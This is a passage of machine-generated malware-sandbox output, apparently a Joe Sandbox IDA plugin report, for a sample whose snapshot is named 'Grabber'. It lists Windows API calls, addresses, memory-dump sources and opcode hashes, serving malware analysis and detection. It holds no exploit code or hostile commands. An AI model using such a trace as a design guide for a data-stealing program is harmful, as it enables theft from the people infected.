                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2E0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2E9
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B302
                                                                                                                                                                                                                            • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C690
                                                                                                                                                                                                                            • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C6DF
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeapwcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2304708654-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
                                                                                                                                                                                                                          • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
                                                                                                                                                                                                                          • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
                                                                                                                                                                                                                          • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharLower
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1615517891-0
                                                                                                                                                                                                                          • Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                                                                                                                                                                                                          • Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00412281
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004122B0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2735977093-0
                                                                                                                                                                                                                          • Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                                                                                                                                                                                                          • Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004121E4
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00412216
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2735977093-0
                                                                                                                                                                                                                          • Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                                                                                                                                                                                                          • Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetFolderLocation.SHELL32(00000000,02199F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A99A
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4012708801-0
                                                                                                                                                                                                                          • Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                                                                                                                                                                                                          • Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                                                                                                                                                                                                                            • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                                                                                                                                                                                                                            • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 85618057-0
                                                                                                                                                                                                                          • Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                                                                                                                                                                                                          • Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                            • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                            • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                                                                                                                                                                                                                            • Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F
                                                                                                                                                                                                                            • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                                                                                                                                                                                                                            • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                                                                                                                                                                                                                            • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                                                                                                                                                                            • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                                                                                                                                                                            • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                                                                                                                                                                            • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                                                                                                                                                                                                                            • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                                                                                                                                                                                                                            • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                                                                                                                                                                            • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                                                                                                                                                                                                                            • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                                                                                                                                                                            • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                          • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02197F20,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                                                                                                                                                                                                                            • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                                                                                                                                                                                                                          • String ID: $pA
                                                                                                                                                                                                                          • API String ID: 790731606-4007739358
                                                                                                                                                                                                                          • Opcode ID: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                                                                                                                                                                                                          • Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                                                                                                                                                                                                                          • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02199F70,02199F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                                                                            • Part of subcall function 0040DF50: HeapFree.KERNEL32(02190000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                                                                                                                                                                                                          • String ID: *pA
                                                                                                                                                                                                                          • API String ID: 1199808876-3833533140
                                                                                                                                                                                                                          • Opcode ID: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                                                                                                                                                                                                          • Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
                                                                                                                                                                                                                            • Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
                                                                                                                                                                                                                            • Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$AllocCommandHeapLine
                                                                                                                                                                                                                          • String ID: $"
                                                                                                                                                                                                                          • API String ID: 1339485270-3817095088
                                                                                                                                                                                                                          • Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                                                                                                                                                                                                          • Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmpwcscmp
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 3419221977-513306843
                                                                                                                                                                                                                          • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                                                                                                                                                                          • Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 626452242-513306843
                                                                                                                                                                                                                          • Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                                                                                                                                                                                                          • Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCriticalHeapSection$EnterLeave
